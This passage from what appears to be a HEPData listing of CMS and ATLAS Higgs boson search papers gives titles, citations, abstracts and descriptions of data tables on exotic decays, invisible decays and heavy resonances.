channels. All results are obtained for mH=125.09 GeV. Data are from Table 2 and 2016 added from Figure 1b. Best-fit value of the H-->b bbar signal strength with its 1 sigma systematic (red) and total (blue) uncertainties for the five individual production modes considered, as well as the overall combined result. The vertical dashed line indicates the standard model expectation. All results are extracted from a single fit combining all input analyses, with mH = 125.09 GeV. Data from Figure 3. Search for an exotic decay of the Higgs boson to a pair of light pseudoscalars in the final state with two b quarks and two $\tau$ leptons in proton-proton collisions at $\sqrt{s}=$ 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. Phys.Lett. B785 (2018) 462, 2018. Inspire Record 1674926 DOI 10.17182/hepdata.86228 A search for an exotic decay of the Higgs boson to a pair of light pseudoscalar bosons is performed for the first time in the final state with two b quarks and two $\tau$ leptons. The search is motivated in the context of models of physics beyond the standard model (SM), such as two Higgs doublet models extended with a complex scalar singlet (2HDM+S), which include the next-to-minimal supersymmetric SM (NMSSM). The results are based on a data set of proton-proton collisions corresponding to an integrated luminosity of 35.9 fb$^{-1}$, accumulated by the CMS experiment at the LHC in 2016 at a center-of-mass energy of 13 TeV. Masses of the pseudoscalar boson between 15 and 60 GeV are probed, and no excess of events above the SM expectation is observed. Upper limits between 3 and 12% are set on the branching fraction $\mathcal{B}$(h $\to$ aa $\to$ 2$\tau$2b) assuming the SM production of the Higgs boson. Upper limits are also set on the branching fraction of the Higgs boson to two light pseudoscalar bosons in different 2HDM+S scenarios. Assuming the SM production cross section for the Higgs boson, the upper limit on this quantity is as low as 20% for a mass of the pseudoscalar of 40 GeV in the NMSSM. 1 data table Expected and observed 95% CL upper limits on (sigma(pp->h)/sigma(pp->hSM)) * B(h -> aa -> bbtautau) as a function of m(a), where h(SM) is the Higgs boson of the standard model, h is the observed particle with mass of 125 GeV, and a denotes a light Higgs-like state, as obtained from the 13 TeV data. Search for an exotic decay of the Higgs boson to a pair of light pseudoscalars in the final state of two muons and two $\tau$ leptons in proton-proton collisions at $ \sqrt{s}=13 $ TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. JHEP 1811 (2018) 018, 2018. Inspire Record 1673011 DOI 10.17182/hepdata.85886 A search for exotic Higgs boson decays to light pseudoscalars in the final state of two muons and two $\tau$ leptons is performed using proton-proton collision data recorded by the CMS experiment at the LHC at a center-of-mass energy of 13 TeV in 2016, corresponding to an integrated luminosity of 35.9 fb$^{-1}$. Masses of the pseudoscalar boson between 15.0 and 62.5 GeV are probed, and no significant excess of data is observed above the prediction of the standard model. Upper limits are set on the branching fraction of the Higgs boson to two light pseudoscalar bosons in different types of two-Higgs-doublet models extended with a complex scalar singlet. 1 data table Expected and observed 95% CL upper limits on (sigma(pp->h)/sigma(pp->hSM)) * B(h -> aa -> mumutautau) as a function of m(a), where h(SM) is the Higgs boson of the standard model, h is the observed particle with mass of 125 GeV, and a denotes a light Higgs-like state, as obtained from the 13 TeV data. Search for lepton flavour violating decays of the Higgs boson to $\mu\tau$ and e$\tau$ in proton-proton collisions at $\sqrt{s}=$ 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. JHEP 1806 (2018) 001, 2018. Inspire Record 1644363 DOI 10.17182/hepdata.83881 A search for lepton flavour violating decays of the Higgs boson in the μτ and eτ decay modes is presented. The search is based on a data set corresponding to an integrated luminosity of 35.9 fb$^{−1}$ of proton-proton collisions collected with the CMS detector in 2016, at a centre-of-mass energy of 13 TeV. No significant excess over the standard model expectation is observed. The observed (expected) upper limits on the lepton flavour violating branching fractions of the Higgs boson are ℬ(H → μτ) < 0.25% (0.25%) and ℬ(H → eτ) < 0.61% (0.37%), at 95% confidence level. These results are used to derive upper limits on the off-diagonal μτ and eτ Yukawa couplings $ \sqrt{{\left|{Y}_{\mu \tau}\right|}^2+{\left|{Y}_{\tau \mu}\right|}^2}<1.43\times {10}^{-3} $ and $ \sqrt{{\left|{Y}_{\mathrm{e}\tau}\right|}^2+{\left|{Y}_{\tau \mathrm{e}}\right|}^2}<2.26\times {10}^{-3} $ at 95% confidence level. The limits on the lepton flavour violating branching fractions of the Higgs boson and on the associated Yukawa couplings are the most stringent to date. 6 data tables Expected and observed 95 percent CL upper limits on BR(H to mu tau) for each individual category and combined from BDT fit analysis Expected and observed 95 percent CL upper limits on BR(H to mu tau) for each individual category and combined from collinear mass fit analysis Expected and observed 95 percent CL upper limits on BR(H to e tau) for each individual category and combined from BDT fit analysis More… Search for beyond the standard model Higgs bosons decaying into a $\mathrm{b\overline{b}}$ pair in pp collisions at $\sqrt{s} =$ 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. JHEP 1808 (2018) 113, 2018. Inspire Record 1675818 DOI 10.17182/hepdata.86133 A search for Higgs bosons that decay into a bottom quark-antiquark pair and are accompanied by at least one additional bottom quark is performed with the CMS detector. The data analyzed were recorded in proton-proton collisions at a centre-of-mass energy of $ \sqrt{s}=13 $ TeV at the LHC, corresponding to an integrated luminosity of 35.7 fb$^{−1}$. The final state considered in this analysis is particularly sensitive to signatures of a Higgs sector beyond the standard model, as predicted in the generic class of two Higgs doublet models (2HDMs). No signal above the standard model background expectation is observed. Stringent upper limits on the cross section times branching fraction are set for Higgs bosons with masses up to 1300 GeV. The results are interpreted within several MSSM and 2HDM scenarios. 3 data tables Expected and observed 95% CL upper limits on sigma(pp->b+H(MSSM)+X) * B(H(MSSM) -> bb) in pb as a function of m(H(MSSM)), where H(MSSM) denotes a heavy Higgs-like state like the H and A bosons of MSSM and 2HDM, as obtained from the 13 TeV data. Expected and observed 95% CL upper limits on tan(beta) as a function of m(A) in the mhmodp benchmark scenario for a higgsino mass parameter of mu=+200 GeV. Since theoretical predictions are not reliable for tan(beta)>60, entries for which tan(beta) would exceed this value are indicated by N/A. Expected and observed 95% CL upper limits on tan(beta) as a function of m(A) in the hMSSM benchmark scenario. Since theoretical predictions are not reliable for tan(beta)>60, entries for which tan(beta) would exceed this value are indicated by N/A. Search for pair production of higgsinos in final states with at least three $b$-tagged jets in $\sqrt{s} = 13$ TeV $pp$ collisions using the ATLAS detector The ATLAS collaboration Aaboud, M. ; Aad, Georges ; Abbott, Brad ; et al. Phys.Rev. D98 (2018) 092002, 2018. Inspire Record 1677389 DOI 10.17182/hepdata.83418 A search for pair production of the supersymmetric partners of the Higgs boson (higgsinos H˜) in gauge-mediated scenarios is reported. Each higgsino is assumed to decay to a Higgs boson and a gravitino. Two complementary analyses, targeting high- and low-mass signals, are performed to maximize sensitivity. The two analyses utilize LHC pp collision data at a center-of-mass energy s=13  TeV, the former with an integrated luminosity of 36.1  fb-1 and the latter with 24.3  fb-1, collected with the ATLAS detector in 2015 and 2016. The search is performed in events containing missing transverse momentum and several energetic jets, at least three of which must be identified as b-quark jets. No significant excess is found above the predicted background. Limits on the cross section are set as a function of the mass of the H˜ in simplified models assuming production via mass-degenerate higgsinos decaying to a Higgs boson and a gravitino. Higgsinos with masses between 130 and 230 GeV and between 290 and 880 GeV are excluded at the 95% confidence level. Interpretations of the limits in terms of the branching ratio of the higgsino to a Z boson or a Higgs boson are also presented, and a 45% branching ratio to a Higgs boson is excluded for mH˜≈400  GeV. 16 data tables Distribution of m(h1) for events passing the preselection criteria of the high-mass analysis. Distribution of effective mass for events passing the preselection criteria of the high-mass analysis. Exclusion limits on higgsino pair production. The results of the low-mass analysis are used below m(higgsino) = 300 GeV, while those of the high-mass analysis are used above. The figure shows the observed and expected 95% upper limits on the higgsino pair production cross-section as a function of m(higgsino). More… Search for additional neutral MSSM Higgs bosons in the $\tau\tau$ final state in proton-proton collisions at $\sqrt{s}=$ 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. No Journal Information, 2018. Inspire Record 1663234 DOI 10.17182/hepdata.83155 A search is presented for additional neutral Higgs bosons in the $\tau\tau$ final state in proton-proton collisions at the LHC. The search is performed in the context of the minimal supersymmetric extension of the standard model (MSSM), using the data collected with the CMS detector in 2016 at a center-of-mass energy of 13 TeV, corresponding to an integrated luminosity of 35.9 fb$^{-1}$. To enhance the sensitivity to neutral MSSM Higgs bosons, the search includes production of the Higgs boson in association with b quarks. No significant deviation above the expected background is observed. Model-independent limits at 95% confidence level (CL) are set on the product of the branching fraction for the decay into $\tau$ leptons and the cross section for the production via gluon fusion or in association with b quarks. These limits range from 18 pb at 90 GeV to 3.5 fb at 3.2 TeV for gluon fusion and from 15 pb (at 90 GeV) to 2.5 fb (at 3.2 TeV) for production in association with b quarks. In the m$_{\text{h}}^{\text{mod+}}$ scenario these limits translate into a 95% CL exclusion of $\tan\beta>$ 6 for neutral Higgs boson masses below 250 GeV, where $\tan\beta$ is the ratio of the vacuum expectation values of the neutral components of the two Higgs doublets. The 95% CL exclusion contour reaches 1.6 TeV for $\tan\beta=$ 60. 6 data tables Expected and observed 95% CL upper limits for the production of a single narrow resonance, $\phi$, with a mass between 90 GeV and 3.2 TeV via gluon-gluon fusion. This limit database corresponds to the values shown in Figure 7a of the paper. Expected and observed 95% CL upper limits for the production of a single narrow resonance, $\phi$, with a mass between 90 GeV and 3.2 TeV in association with b-quarks. This limit database corresponds to the values shown in Figure 7b of the paper. Scan of the likelihood function for the search in the $\tau\tau$ final state for a single narrow resonance, $\phi$, produced via gluon fusion ($gg\phi$) or in association with b quarks ($bb\phi$). The scan is performed in 40000 points of the ($\sigma(gg\phi)\cdot B(\phi\rightarrow\tau\tau)$, $\sigma(bb\phi)\cdot B(\phi\rightarrow\tau\tau)$) plane. An asimov dataset constructed from the expectation of all backgrounds and the SM Higgs boson is tested against a background hypothesis including the SM Higgs boson. For further details and instructions, please have a look into the following README file http://cms-results.web.cern.ch/cms-results/public-results/publications/HIG-17-020/2D-likelihood-scans/README.txt. Selected examples of such a likelihood scan are given in Figure 8 of the paper. More… Search for heavy ZZ resonances in the $\ell ^+\ell ^-\ell ^+\ell ^-$ and $\ell ^+\ell ^-\nu \bar{\nu }$ final states using proton–proton collisions at $\sqrt{s}= 13$   $\text {TeV}$ with the ATLAS detector The ATLAS collaboration Aaboud, M. ; Aad, Georges ; Abbott, Brad ; et al. Eur.Phys.J. C78 (2018) 293, 2018. Inspire Record 1643838 DOI 10.17182/hepdata.83012 A search for heavy resonances decaying into a pair of $Z$ bosons leading to $\ell^+\ell^-\ell^+\ell^-$ and $\ell^+\ell^-\nu\bar\nu$ final states, where $\ell$ stands for either an electron or a muon, is presented. The search uses proton proton collision data at a centre-of-mass energy of 13 TeV corresponding to an integrated luminosity of 36.1 fb$^{-1}$ collected with the ATLAS detector during 2015 and 2016 at the Large Hadron Collider. Different mass ranges for the hypothetical resonances are considered, depending on the final state and model. The different ranges span between 200 GeV and 2000 GeV. The results are interpreted as upper limits on the production cross section of a spin 0 or spin 2 resonance. The upper limits for the spin 0 resonance are translated to exclusion contours in the context of Type I and Type II two-Higgs-doublet models, while those for the spin 2 resonance are used to constrain the Randall Sundrum model with an extra dimension giving rise to spin 2 graviton excitations. 10 data tables Distribution of the four-lepton invariant mass (m4l) in the four-lepton search for the ggF-enriched category. Distribution of the four-lepton invariant mass (m4l) in the four-lepton search for the VBF-enriched category. Transverse mass mT in the llnunu search for the electron channel. More… Search for pair production of Higgs bosons in the $b\bar{b}b\bar{b}$ final state using proton-proton collisions at $\sqrt{s} = 13$ TeV with the ATLAS detector The ATLAS collaboration Aaboud, Morad ; Aad, Georges ; Abbott, Brad ; et al. No Journal Information, 2018. Inspire Record 1668124 DOI 10.17182/hepdata.82599 A search for Higgs boson pair production in the $b\bar{b}b\bar{b}$ final state is carried out with up to 36.1 $\mathrm{fb}^{-1}$ of LHC proton--proton collision data collected at $\sqrt{s}$ = 13 TeV with the ATLAS detector in 2015 and 2016. Three benchmark signals are studied: a spin-2 graviton decaying into a Higgs boson pair, a scalar resonance decaying into a Higgs boson pair, and Standard Model non-resonant Higgs boson pair production. Two analyses are carried out, each implementing a particular technique for the event reconstruction that targets Higgs bosons reconstructed as pairs of jets or single boosted jets. The resonance mass range covered is 260--3000 GeV. The analyses are statistically combined and upper limits on the production cross section of Higgs boson pairs times branching ratio to $b\bar{b}b\bar{b}$ are set in each model. No significant excess is observed; the largest deviation of data over prediction is found at a mass of 280 GeV, corresponding to 2.3 standard deviations globally. The observed 95% confidence level upper limit on the non-resonant production is 13 times the Standard Model prediction. 4 data tables The observed and expected 95% CL upper limits on the production cross section times branching ratio for the narrow-width scalar. The observed and expected 95% CL upper limits on the production cross section times branching ratio for the bulk Randall-Sundrum model with $\frac{k}{\overline{M}_{\mathrm{Pl}}} = 1$. The observed and expected 95% CL upper limits on the production cross section times branching ratio for the bulk Randall-Sundrum model with $\frac{k}{\overline{M}_{\mathrm{Pl}}} = 2$. More… Search for an invisibly decaying Higgs boson or dark matter candidates produced in association with a $Z$ boson in $pp$ collisions at $\sqrt{s} =$ 13 TeV with the ATLAS detector The ATLAS collaboration Aaboud, Morad ; Aad, Georges ; Abbott, Brad ; et al. Phys.Lett. B776 (2018) 318-337, 2018. Inspire Record 1620909 DOI 10.17182/hepdata.80461 A search for an invisibly decaying Higgs boson or dark matter candidates produced in association with a leptonically decaying $Z$ boson in proton--proton collisions at $\sqrt{s} =$ 13 TeV is presented. This search uses 36.1 fb$^{-1}$ of data collected by the ATLAS experiment at the Large Hadron Collider. No significant deviation from the expectation of the Standard Model backgrounds is observed. Assuming the Standard Model $ZH$ production cross-section, an observed (expected) upper limit of 67% (39%) at the 95% confidence level is set on the branching ratio of invisible decays of the Higgs boson with mass $m_H = $ 125 GeV. The corresponding limits on the production cross-section of the $ZH$ process with the invisible Higgs boson decays are also presented. Furthermore, exclusion limits on the dark matter candidate and mediator masses are reported in the framework of simplified dark matter models. 13 data tables Observed E<sub>T</sub><sup>miss</sup> distribution in the ee channel compared to the signal and background predictions. The error band shows the total statistical and systematic uncertainty on the background prediction. The background predictions are presented as they are before being fit to the data. The ratio plot gives the observed data yield over the background prediction (black points) as well as the signal-plus-background contribution divided by the background prediction (blue or purple line) in each E<sub>T</sub><sup>miss</sup> bin. The rightmost bin contains the overflow contributions. The ZH &rarr; &#8467;&#8467; + inv signal distribution is shown with BR<sub>H &rarr; inv</sub> =0.3, which is the value most compatible with data. The simulated DM distribution with m<sub>med</sub> = 500 GeV and m<sub>&chi;</sub> = 100 GeV is also scaled (with a factor of 0.27) to the best-fit contribution. Observed E<sub>T</sub><sup>miss</sup> distribution in the &mu;&mu; channel compared to the signal and background predictions. The error band shows the total statistical and systematic uncertainty on the background prediction. The background predictions are presented as they are before being fit to the data. The ratio plot gives the observed data yield over the background prediction (black points) as well as the signal-plus-background contribution divided by the background prediction (blue or purple line) in each E<sub>T</sub><sup>miss</sup> bin. The rightmost bin contains the overflow contributions. The ZH &rarr; &#8467;&#8467; + inv signal distribution is shown with BR<sub>H &rarr; inv</sub> =0.3, which is the value most compatible with data. The simulated DM distribution with m<sub>med</sub> = 500 GeV and m<sub>&chi;</sub> = 100 GeV is also scaled (with a factor of 0.27) to the best-fit contribution. DM exclusion limit in the two-dimensional phase space of WIMP mass m<sub>&chi;</sub> vs mediator mass m<sub>med</sub> determined using the combined ee+&mu;&mu; channel. Both the observed and expected limits are presented, and the 1&sigma; uncertainty band for the expected limits is also provided. Regions bounded by the limit curves are excluded at the 95% CL. The grey line labelled with "m<sub>med</sub> = 2m<sub>&chi;</sub>'' indicates the kinematic threshold where the mediator can decay on-shell into WIMPs, and the other grey line gives the perturbative limit (arXiv 1603.04156). The relic density line (arXiv 1603.04156) illustrates the combination of m<sub>&chi;</sub> and m<sub>med</sub> that would explain the observed DM relic density. More… Searches for invisible decays of the Higgs boson in pp collisions at sqrt(s) = 7, 8, and 13 TeV The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. JHEP 1702 (2017) 135, 2017. Inspire Record 1495025 DOI 10.17182/hepdata.79078 Searches for invisible decays of the Higgs boson are presented. The data collected with the CMS detector at the LHC correspond to integrated luminosities of 5.1, 19.7, and 2.3 fb$^{−1}$ at centre-of-mass energies of 7, 8, and 13 TeV, respectively. The search channels target Higgs boson production via gluon fusion, vector boson fusion, and in association with a vector boson. Upper limits are placed on the branching fraction of the Higgs boson decay to invisible particles, as a function of the assumed production cross sections. The combination of all channels, assuming standard model production, yields an observed (expected) upper limit on the invisible branching fraction of 0.24 (0.23) at the 95% confidence level. The results are also interpreted in the context of Higgs-portal dark matter models. 9 data tables Observed and expected 95% CL limits on $\sigma\mathcal{B}(H\rightarrow inv)/\sigma(SM)$ for individual combinations of categories targeting qqH, VH, and ggH production, and the full combination assuming a Higgs boson with a mass of 125 GeV. Observed 95% CL upper limits on $\mathcal{B}(H \rightarrow inv)$ assuming a Higgs boson with a mass of 125 GeV whose production cross sections are scaled, relative to their SM values as a function of the coupling modifiers $\kappa_{F}$ and $\kappa_{V}$. Observed 95% CL upper limits on $\mathcal{B}(H \rightarrow inv)$ assuming a Higgs boson with a mass of 125 GeV whose production cross sections are scaled, relative to their SM values, by $\mu_{\mathrm{qqH,VH}}$ and $\mu_{\mathrm{ggH}}$. More… Searches for heavy $ZZ$ and $ZW$ resonances in the $\ell\ell qq$ and $\nu\nu qq$ final states in $pp$ collisions at $\sqrt{s}=13$ TeV with the ATLAS detector The ATLAS collaboration Aaboud, Morad ; Aad, Georges ; Abbott, Brad ; et al. No Journal Information, 2017. Inspire Record 1620910 DOI 10.17182/hepdata.78550 This paper reports searches for heavy resonances decaying into $ZZ$ or $ZW$ using data from proton--proton collisions at a centre-of-mass energy of $\sqrt{s}=13$ TeV. The data, corresponding to an integrated luminosity of 36.1 fb$^{-1}$, were recorded with the ATLAS detector in 2015 and 2016 at the Large Hadron Collider. The searches are performed in final states in which one $Z$ boson decays into either a pair of light charged leptons (electrons and muons) or a pair of neutrinos, and the associated $W$ boson or the other $Z$ boson decays hadronically. No evidence of the production of heavy resonances is observed. Upper bounds on the production cross sections of heavy resonances times their decay branching ratios to $ZZ$ or $ZW$ are derived in the mass range 300--5000 GeV within the context of Standard Model extensions with additional Higgs bosons, a heavy vector triplet or warped extra dimensions. Production through gluon--gluon fusion, Drell--Yan or vector-boson fusion are considered, depending on the assumed model. 16 data tables Selection acceptance times efficiency for ggF H -> Z Z -> llqq as a function of the Higgs boson mass, combining the HP and LP signal regions of the ZV -> llJ selection and the b-tagged and untagged regions of the ZV -> lljj selection. Selection acceptance times efficiency for VBF H -> Z Z -> llqq as a function of the Higgs boson mass, combining the HP and LP signal regions of the ZV -> llJ selection and the b-tagged and untagged regions of the ZV -> lljj selection. Selection acceptance times efficiency for ggF H -> Z Z -> vvqq as a function of the Higgs boson mass, combining the HP and LP signal regions. More… Search for the dimuon decay of the Higgs boson in $pp$ collisions at $\sqrt{s}$ = 13 TeV with the ATLAS detector The ATLAS collaboration Aaboud, Morad ; Aad, Georges ; Abbott, Brad ; et al. Phys.Rev.Lett. 119 (2017) 051802, 2017. Inspire Record 1599399 DOI 10.17182/hepdata.78379 A search for the dimuon decay of the Higgs boson was performed using data corresponding to an integrated luminosity of 36.1  fb-1 collected with the ATLAS detector in pp collisions at s=13  TeV at the Large Hadron Collider. No significant excess is observed above the expected background. The observed (expected) upper limit on the cross section times branching ratio is 3.0 (3.1) times the Standard Model prediction at the 95% confidence level for a Higgs boson mass of 125 GeV. When combined with the pp collision data at s=7  TeV and s=8  TeV, the observed (expected) upper limit is 2.8 (2.9) times the Standard Model prediction. 3 data tables Event yields for the expected signal (S) and background (B) processes, and numbers of the observed data events in different categories. The full widths at half maximum (FWHM) of the signal $m_{μμ}$ distributions are also shown. In each category, the event yields are counted within an $m_{μμ}$ interval, which is centered at the simulated signal peak and contains 90% of the expected signal events. The expected signal event yields are normalized to $36.1 fb^-1$. The background in each category is normalized to the observed data yield, while the relative fractions between the different processes are fixed to the SM predictions. The 95% CL upper limit on signal strength Measurement of signal strength Search for two Higgs bosons in final states containing two photons and two bottom quarks in proton-proton collisions at 8 TeV The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Phys.Rev. D94 (2016) 052012, 2016. Inspire Record 1431986 DOI 10.17182/hepdata.77003 A search is presented for the production of two Higgs bosons in final states containing two photons and two bottom quarks. Both resonant and nonresonant hypotheses are investigated. The analyzed data correspond to an integrated luminosity of 19.7  fb-1 of proton-proton collisions at s=8  TeV collected with the CMS detector. Good agreement is observed between data and predictions of the standard model (SM). Upper limits are set at 95% confidence level on the production cross section of new particles and compared to the prediction for the existence of a warped extra dimension. When the decay to two Higgs bosons is kinematically allowed, assuming a mass scale ΛR=1  TeV for the model, the data exclude a radion scalar at masses below 980 GeV. The first Kaluza-Klein excitation mode of the graviton in the RS1 Randall-Sundrum model is excluded for masses between 325 and 450 GeV. An upper limit of 0.71 pb is set on the nonresonant two-Higgs-boson cross section in the SM-like hypothesis. Limits are also derived on nonresonant production assuming anomalous Higgs-boson couplings. 3 data tables Observed $m_\mathrm{jj}$ spectrum (black points) compared with a background estimate (black line), obtained in background only hypothesis, for HPHP category. The simulated radion resonances of $m_\mathrm{X} = 1.5$ and 2 TeV are also shown. Observed and expected 95% CL upper limits on the product of cross section and the branching fraction sigma(pp->X)*B(X->HH) obtained through a combination of the two event categories. The limits for mX = 400 GeV are shown for both Low mass and High mass signal extraction methods. Observed and expected 95% CL upper limits on the product of cross section and the branching fraction sigma(pp->X)*B(X->HH->gamma gamma b b ) for the nonresonant BSM analysis, performed by changing the parameters $kappa_$lambda, y_t and c_2 while keeping all other parameters fixed at the SM predictions. Signal efficiencies in the four different signal regions for the nonresonant BSM analysis, performed by changing the parameters $kappa_$lambda, y_t and c_2 while keeping all other parameters fixed at the SM predictions. The four signal regions are made in b-tag and m_HH categries, being those: "Low-purity, High-mass" (LPHM), "Low-purity, Low-mass" (LPLM), "High-purity, High-mass" (HPHM) and "High-purity, Low-mass" (HPLM). Measurement of differential cross sections for Higgs boson production in the diphoton decay channel in pp collisions at $\sqrt{s}=8\,\text {TeV} $ The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Eur.Phys.J. C76 (2016) 13, 2016. Inspire Record 1391147 DOI 10.17182/hepdata.75470 A measurement is presented of differential cross sections for Higgs boson (H) production in pp collisions at $\sqrt{s}=8$ $\,\text {TeV}$ . The analysis exploits the ${H} \rightarrow {\gamma }{\gamma }$ decay in data corresponding to an integrated luminosity of 19.7 $\,\text {fb}^\text {-1}$ collected by the CMS experiment at the LHC. The cross section is measured as a function of the kinematic properties of the diphoton system and of the associated jets. Results corrected for detector effects are compared with predictions at next-to-leading order and next-to-next-to-leading order in perturbative quantum chromodynamics, as well as with predictions beyond the standard model. For isolated photons with pseudorapidities $|\eta |<2.5$ , and with the photon of largest and next-to-largest transverse momentum ( $p_{\mathrm {T}} ^{\gamma }$ ) divided by the diphoton mass $m_{\gamma \gamma }$ satisfying the respective conditions of $p_{\mathrm {T}} ^{\gamma }/m_{\gamma \gamma }> 1/3$ and ${>}1/4$ , the total fiducial cross section is $32 \pm 10$ $\text {\,fb}$ . 13 data tables Values of the pp $\to$ H $\to \gamma\gamma$ differential cross sections as a function of kinematic observables as measured in data and as predicted in SM simulations. For each observable the fit to $m_{\gamma\gamma}$ is performed simultaneously in all the bins. Since the signal mass is profiled for each observable, the best fit $\hat{m}_{\rm{H}}$ varies from observable to observable. Values of the pp $\to$ H $\to \gamma\gamma$ differential cross sections as a function of $p_{\rm{T}}^{\gamma\gamma}$ as measured in data. For each observable the fit to $m_{\gamma\gamma}$ is performed simultaneously in all the bins. Since the signal mass is profiled for each observable, the best fit $\hat{m}_{\rm{H}}$ varies from observable to observable. Values of the pp $\to$ H $\to \gamma\gamma$ differential cross sections as a function of |$\cos\theta^{\ast}$| as measured in data. For each observable the fit to $m_{\gamma\gamma}$ is performed simultaneously in all the bins. Since the signal mass is profiled for each observable, the best fit $\hat{m}_{\rm{H}}$ varies from observable to observable. More… Search for a low-mass pseudoscalar Higgs boson produced in association with a $b\bar{b}$ pair in pp collisions at $\sqrt{s} =$ 8 TeV The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Phys.Lett. B758 (2016) 296-320, 2016. Inspire Record 1403990 DOI 10.17182/hepdata.73991 A search is reported for a light pseudoscalar Higgs boson decaying to a pair of τ leptons, produced in association with a bb‾ pair, in the context of two-Higgs-doublet models. The results are based on pp collision data at a centre-of-mass energy of 8 TeV collected by the CMS experiment at the LHC and corresponding to an integrated luminosity of 19.7 fb −1 . Pseudoscalar boson masses between 25 and 80 GeV are probed. No evidence for a pseudoscalar boson is found and upper limits are set on the product of cross section and branching fraction to τ pairs between 7 and 39 pb at the 95% confidence level. This excludes pseudoscalar A bosons with masses between 25 and 80 GeV, with SM-like Higgs boson negative couplings to down-type fermions, produced in association with bb‾ pairs, in Type II, two-Higgs-doublet models. 1 data table Expected and observed 95 % CL combined upper limits in pb on pseudoscalar Higgs bosons produced in association with bb pairs, along with their 1 and 2 standard deviation uncertainties. Search for heavy resonances decaying to two Higgs bosons in final states containing four b quarks The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Eur.Phys.J. C76 (2016) 371, 2016. Inspire Record 1424833 DOI 10.17182/hepdata.73976 A search is presented for narrow heavy resonances X decaying into pairs of Higgs bosons ( ${\mathrm{H}}$ ) in proton-proton collisions collected by the CMS experiment at the LHC at $\sqrt{s}=8\,\text {TeV} $ . The data correspond to an integrated luminosity of 19.7 $\,\text {fb}^{-1}$ . The search considers ${\mathrm{H}} {\mathrm{H}} $ resonances with masses between 1 and 3 $\,\text {TeV}$ , having final states of two b quark pairs. Each Higgs boson is produced with large momentum, and the hadronization products of the pair of b quarks can usually be reconstructed as single large jets. The background from multijet and ${\mathrm{t}}\overline{{\mathrm{t}}}$ events is significantly reduced by applying requirements related to the flavor of the jet, its mass, and its substructure. The signal would be identified as a peak on top of the dijet invariant mass spectrum of the remaining background events. No evidence is observed for such a signal. Upper limits obtained at 95 % confidence level for the product of the production cross section and branching fraction $\sigma ({{\mathrm{g}} {\mathrm{g}}} \rightarrow \mathrm {X})\, \mathcal {B}({\mathrm {X}} \rightarrow {\mathrm{H}} {\mathrm{H}} \rightarrow {\mathrm{b}} \overline{{\mathrm{b}}} {\mathrm{b}} \overline{{\mathrm{b}}} )$ range from 10 to 1.5 $\text {\,fb}$ for the mass of X from 1.15 to 2.0 $\,\text {TeV}$ , significantly extending previous searches. For a warped extra dimension theory with a mass scale $\Lambda _\mathrm {R} = 1$ $\,\text {TeV}$ , the data exclude radion scalar masses between 1.15 and 1.55 $\,\text {TeV}$ . 7 data tables Observed $m_\mathrm{jj}$ spectrum (black points) compared with a background estimate (black line), obtained in background only hypothesis, for HPHP category. The simulated radion resonances of $m_\mathrm{X} = 1.5$ and 2 TeV are also shown. Observed $m_\mathrm{jj}$ spectrum (black points) compared with a background estimate (black line), obtained in background only hypothesis, for HPLP category. The simulated radion resonances of $m_\mathrm{X} = 1.5$ and 2 TeV are also shown. Observed $m_\mathrm{jj}$ spectrum (black points) compared with a background estimate (black line), obtained in background only hypothesis, for LPHP category. The simulated radion resonances of $m_\mathrm{X} = 1.5$ and 2 TeV are also shown. More… Search for a Higgs boson decaying into $\gamma^* \gamma \to \ell \ell \gamma$ with low dilepton mass in pp collisions at $\sqrt s = $ 8 TeV The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. Phys.Lett. B753 (2016) 341-362, 2016. Inspire Record 1382587 DOI 10.17182/hepdata.73712 A search is described for a Higgs boson decaying into two photons, one of which has an internal conversion to a muon or an electron pair ( ℓℓγ ). The analysis is performed using proton–proton collision data recorded with the CMS detector at the LHC at a centre-of-mass energy of 8 TeV, corresponding to an integrated luminosity of 19.7 fb −1 . The events selected have an opposite-sign muon or electron pair and a high transverse momentum photon. No excess above background has been found in the three-body invariant mass range 120<mℓℓγ<150 GeV , and limits have been derived for the Higgs boson production cross section times branching fraction for the decay H→γ⁎γ→ℓℓγ , where the dilepton invariant mass is less than 20 GeV. For a Higgs boson with mH=125 GeV , a 95% confidence level (CL) exclusion observed (expected) limit is 6.7 ( 5.9−1.8+2.8 ) times the standard model prediction. Additionally, an upper limit at 95% CL on the branching fraction of H→(J/ψ)γ for the 125 GeV Higgs boson is set at 1.5×10−3 . 4 data tables The 95% CL exclusion limit, as a function of the mass hypothesis, $m_H$ , on $\sigma/\sigma_{SM}$, the cross section times the branching fraction of a Higgs boson decaying into a photon and a lepton pair with $m_{\ell\ell}$ < 20 GeV, divided by the SM value. The 95% CL exclusion limit, as a function of the mass hypothesis, $m_H$ , on $\sigma/\sigma_{SM}$, the cross section times the branching fraction of a Higgs boson decaying into a photon and a lepton pair with $m_{\ell\ell}$ < 20 GeV, divided by the SM value. The 95% CL exclusion limit, as a function of the mass hypothesis, $m_H$ , on $\sigma/\sigma_{SM}$, the cross section times the branching fraction of a Higgs boson decaying into a photon and a lepton pair with $m_{\ell\ell}$ < 20 GeV, divided by the SM value. More… Search for a Higgs Boson in the Mass Range from 145 to 1000 GeV Decaying to a Pair of W or Z Bosons The CMS collaboration Khachatryan, Vardan ; Sirunyan, Albert M ; Tumasyan, Armen ; et al. JHEP 1510 (2015) 144, 2015. Inspire Record 1357982 DOI 10.17182/hepdata.70736 A search for a heavy Higgs boson in the $\mathrm{H \to WW}$ and $\mathrm{H \to ZZ}$ decay channels is reported. The search is based upon proton-proton collision data samples corresponding to an integrated luminosity of up to 5.1 fb$^{-1}$ at $\sqrt{s}$ = 7 TeV and up to 19.7 fb$^{-1}$ at $\sqrt{s}$ = 8 